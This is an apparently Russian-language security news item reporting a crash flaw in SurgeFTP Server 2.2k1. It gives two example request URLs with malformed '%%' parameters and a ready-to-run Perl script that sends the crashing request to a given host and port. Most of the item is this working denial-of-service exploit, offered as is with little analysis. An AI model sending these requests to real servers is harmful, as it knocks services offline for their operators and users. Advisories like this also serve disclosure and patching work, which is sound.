Программа: SurgeFTP Server 2.2k1 

Уязвимость обнаружена в SurgeFTP Server. Удаленный пользователь может аварийно завершить работу FTP сервера. 

Пример: 

http://[server]:7021/cgi/surgeftpmgr.cgi?cmd=%%
http://[server]/cgi/?r34ct=%di e%

Эксплоит: 

#!/usr/bin/perl
use IO::Socket;
printf "SurgeFtp 2.2k1\n\n";
if(@ARGV < 2) { die "\nUsage: host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];

$sock =new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => "TCP");

print $sock "GET /cgi/surgeftpmgr.cgi?cmd=%% http/1.0\n\n";
while (<$sock>){print}

close ($sock);

print("\n\n");
exit;

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии